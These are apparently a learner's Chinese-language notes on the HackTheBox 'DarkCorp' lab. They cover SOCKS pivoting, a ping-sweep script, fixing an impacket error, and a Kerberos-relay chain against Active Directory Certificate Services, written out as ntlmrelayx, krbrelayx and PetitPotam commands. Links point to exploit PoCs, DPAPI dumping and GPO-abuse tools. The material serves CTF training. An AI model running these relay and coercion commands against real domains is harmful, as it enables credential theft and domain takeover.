HTB_DarkCorp

windows(Insane)

ssh -D 1080 [email protected] 

Q2：因为域控是内网的，所以，进行bloodhound的时候要有个DNAT，根据 cutearmadillo师傅所说 用proxychains配置里添加dnat那一行

dnat 10.10.11.54 172.16.20.1

#!/bin/bash

# 获取本机 IP
my_ip=$(hostname -I | awk '{print $1}')
subnet=$(echo"$my_ip" | awk -F '.''{print $1"."$2"."$3}')
echo"[*] 本机 IP: $my_ip"
echo"[*] 扫描子网: $subnet.0/24"

# 扫描 1~254 号 IP
for i in {1..254}; do
    target="$subnet.$i"
    (ping -c 1 -W 1 "$target" &> /dev/null && echo"[+] 存活 IP: $target") &
done

wait
echo"[*] 扫描完成！"

bp+socks代理，出现401

Q3：PetitPotam.py问题

 File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 36, in run
    ADCSAttack._run(self)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 78, in _run
    certificate_store = self.generate_pfx(key, certificate)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 100, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 72, in __getattr__
    obj = getattr(self._module, attr)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

一般是impacket的版本低了

pip install --upgrade impacket
#一般都是进入虚拟环境了，才支持pip install

参考

wp：

https://4xura.com/ctf/htb/htb-writeup-darkcorp

https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability

https://github.com/bartfroklage/CVE-2024-37383-POC

https://github.com/squid22/PostgreSQL_RCE/blob/main/postgresql_rce.py

NTLM-relay：

https://book.hacktricks.wiki/en/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.html#ntml-relay-attack

此攻击利用 SMB 认证会话访问目标机器，如果成功则授予系统 shell。关键前提条件包括：

认证用户必须在中继主机上具有本地管理员访问权限。
SMB 签名应禁用。

https://blog.csdn.net/qq_18811919/article/details/129245212

https://github.com/topotam/PetitPotam

kerberos-relayx:

https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx

1.用ntlmrelayx添加恶意的DNS记录，这个记录名需要绕过
 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
比如dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
impacket-ntlmrelayx -t "ldap://172.16.20.1" --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' kali-ip

2.可能是为了获取到证书，以便后续登录
proxychains python ~/htb/tools/krb*/krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'

3.强制域控制器对我们进行身份验证
proxychains python ~/htb/tools/Petit*/PetitPotam.py -u victor.r -p 'v??' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' web-01.darkcorp.htb

如果成功，就可以得到pfx

4.  gettgtpkinit.py -cert-pfx 请求一个TGT

https://github.com/dirkjanm/krbrelayx/tree/master?tab=readme-ov-file#krbrelayxpy

dpapi:

https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html

donapi工具:导出dpapi

https://github.com/login-securite/DonPAPI

python -m pip install poetry
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
#poetry run DonPAPI 我用这个不管用，用的下面的↓
poetry install

GPO-Abuse:

https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html?highlight=GPO#sharpgpoabuse---abuse-gpo

https://github.com/FSecureLABS/SharpGPOAbuse

https://github.com/rootSySdk/PowerGPOAbuse

https://github.com/Hackndo/pyGPOAbuse.git

其它:

https://github.com/ShutdownRepo/pywhisker

https://github.com/dirkjanm/PKINITtools

https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html#:~:text=Marshaled%20Target%20Information%20SPN

https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx